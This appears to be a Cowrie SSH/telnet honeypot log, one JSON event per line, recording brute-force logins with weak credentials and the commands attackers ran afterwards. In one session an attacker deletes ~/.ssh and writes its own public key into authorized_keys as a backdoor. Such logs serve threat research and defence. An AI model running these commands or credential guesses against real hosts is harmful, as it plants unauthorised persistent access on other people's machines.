.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:10:51.741615Z","src_ip":"45.125.211.194","session":"c2788654d247"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwe123","message":"login attempt [oracle/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:10:52.578104Z","src_ip":"45.125.211.194","session":"c2788654d247"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:10:53.790002Z","src_ip":"45.125.211.194","session":"c2788654d247"}
{"eventid":"cowrie.session.connect","src_ip":"166.246.56.147","src_port":59306,"dst_ip":"1.2.3.4","dst_port":23,"session":"ea59d37f34ed","protocol":"telnet","message":"New connection: 166.246.56.147:59306 (1.2.3.4:23) [session: ea59d37f34ed]","sensor":"my-vps","timestamp":"2025-08-28T03:10:59.667511Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":64349,"dst_ip":"1.2.3.4","dst_port":22,"session":"55bf44b6ad55","protocol":"ssh","message":"New connection: 45.125.211.194:64349 (1.2.3.4:22) [session: 55bf44b6ad55]","sensor":"my-vps","timestamp":"2025-08-28T03:11:06.386581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:11:06.411928Z","src_ip":"45.125.211.194","session":"55bf44b6ad55"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:11:06.596372Z","src_ip":"45.125.211.194","session":"55bf44b6ad55"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:11:07.433053Z","src_ip":"45.125.211.194","session":"55bf44b6ad55"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:11:08.004422Z","src_ip":"45.125.211.194","session":"55bf44b6ad55"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:11:08.005133Z","src_ip":"45.125.211.194","session":"55bf44b6ad55"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:11:08.215529Z","src_ip":"45.125.211.194","session":"55bf44b6ad55"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:11:08.216684Z","src_ip":"45.125.211.194","session":"55bf44b6ad55"}
{"eventid":"cowrie.session.closed","duration":31.085767030715942,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:11:19.811903Z","src_ip":"166.246.56.147","session":"070e69561b17"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":43302,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9c5e23c13d4","protocol":"ssh","message":"New connection: 45.125.211.194:43302 (1.2.3.4:22) [session: e9c5e23c13d4]","sensor":"my-vps","timestamp":"2025-08-28T03:11:21.228834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:11:21.238255Z","src_ip":"45.125.211.194","session":"e9c5e23c13d4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:11:21.449346Z","src_ip":"45.125.211.194","session":"e9c5e23c13d4"}
{"eventid":"cowrie.login.failed","username":"www","password":"abc123","message":"login attempt [www/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:11:22.270166Z","src_ip":"45.125.211.194","session":"e9c5e23c13d4"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:11:23.480867Z","src_ip":"45.125.211.194","session":"e9c5e23c13d4"}
{"eventid":"cowrie.session.closed","duration":33.411468267440796,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:11:33.078907Z","src_ip":"166.246.56.147","session":"ea59d37f34ed"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":58512,"dst_ip":"1.2.3.4","dst_port":22,"session":"e14169839c76","protocol":"ssh","message":"New connection: 45.125.211.194:58512 (1.2.3.4:22) [session: e14169839c76]","sensor":"my-vps","timestamp":"2025-08-28T03:11:36.068621Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:11:36.071463Z","src_ip":"45.125.211.194","session":"e14169839c76"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:11:36.278576Z","src_ip":"45.125.211.194","session":"e14169839c76"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123","message":"login attempt [root/qwerty123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:11:37.113332Z","src_ip":"45.125.211.194","session":"e14169839c76"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:11:37.625073Z","src_ip":"45.125.211.194","session":"e14169839c76"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:11:37.625765Z","src_ip":"45.125.211.194","session":"e14169839c76"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:11:37.839407Z","src_ip":"45.125.211.194","session":"e14169839c76"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:11:37.840346Z","src_ip":"45.125.211.194","session":"e14169839c76"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":14151,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f5d385bea1d","protocol":"ssh","message":"New connection: 45.125.211.194:14151 (1.2.3.4:22) [session: 4f5d385bea1d]","sensor":"my-vps","timestamp":"2025-08-28T03:11:50.853482Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:11:50.885073Z","src_ip":"45.125.211.194","session":"4f5d385bea1d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:11:51.063159Z","src_ip":"45.125.211.194","session":"4f5d385bea1d"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar","message":"login attempt [oscar/oscar] failed","sensor":"my-vps","timestamp":"2025-08-28T03:11:51.895212Z","src_ip":"45.125.211.194","session":"4f5d385bea1d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:11:53.105554Z","src_ip":"45.125.211.194","session":"4f5d385bea1d"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":54704,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe0fa50419ec","protocol":"ssh","message":"New connection: 194.233.79.134:54704 (1.2.3.4:22) [session: fe0fa50419ec]","sensor":"my-vps","timestamp":"2025-08-28T03:11:54.075294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:11:54.087533Z","src_ip":"194.233.79.134","session":"fe0fa50419ec"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:11:54.286764Z","src_ip":"194.233.79.134","session":"fe0fa50419ec"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-28T03:11:55.840701Z","src_ip":"194.233.79.134","session":"fe0fa50419ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46093,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bb4fbefed9f","protocol":"ssh","message":"New connection: 212.227.235.229:46093 (1.2.3.4:22) [session: 4bb4fbefed9f]","sensor":"my-vps","timestamp":"2025-08-28T03:11:56.418325Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:11:56.419226Z","src_ip":"212.227.235.229","session":"4bb4fbefed9f"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:11:56.519157Z","src_ip":"212.227.235.229","session":"4bb4fbefed9f"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin#2025","message":"login attempt [root/Admin#2025] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:11:57.144840Z","src_ip":"212.227.235.229","session":"4bb4fbefed9f"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:11:57.208353Z","src_ip":"194.233.79.134","session":"fe0fa50419ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:11:57.344534Z","src_ip":"212.227.235.229","session":"4bb4fbefed9f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:11:57.345200Z","src_ip":"212.227.235.229","session":"4bb4fbefed9f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:11:57.346104Z","src_ip":"212.227.235.229","session":"4bb4fbefed9f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:11:57.580061Z","src_ip":"212.227.235.229","session":"4bb4fbefed9f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:11:57.759875Z","src_ip":"212.227.235.229","session":"4bb4fbefed9f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T03:11:57.760736Z","src_ip":"212.227.235.229","session":"4bb4fbefed9f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T03:11:57.861093Z","src_ip":"212.227.235.229","session":"4bb4fbefed9f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:11:57.861976Z","src_ip":"212.227.235.229","session":"4bb4fbefed9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46094,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a3918208e33","protocol":"ssh","message":"New connection: 212.227.235.229:46094 (1.2.3.4:22) [session: 1a3918208e33]","sensor":"my-vps","timestamp":"2025-08-28T03:11:57.951944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:11:57.961540Z","src_ip":"212.227.235.229","session":"1a3918208e33"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:11:58.055370Z","src_ip":"212.227.235.229","session":"1a3918208e33"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T03:11:58.463818Z","src_ip":"212.227.235.229","session":"1a3918208e33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60000,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd4e1bb129fb","protocol":"ssh","message":"New connection: 212.227.235.229:60000 (1.2.3.4:22) [session: cd4e1bb129fb]","sensor":"my-vps","timestamp":"2025-08-28T03:11:59.346852Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:11:59.457747Z","src_ip":"212.227.235.229","session":"cd4e1bb129fb"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:11:59.566025Z","src_ip":"212.227.235.229","session":"1a3918208e33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46095,"dst_ip":"1.2.3.4","dst_port":22,"session":"a223b0af8af6","protocol":"ssh","message":"New connection: 212.227.235.229:46095 (1.2.3.4:22) [session: a223b0af8af6]","sensor":"my-vps","timestamp":"2025-08-28T03:11:59.658732Z"}
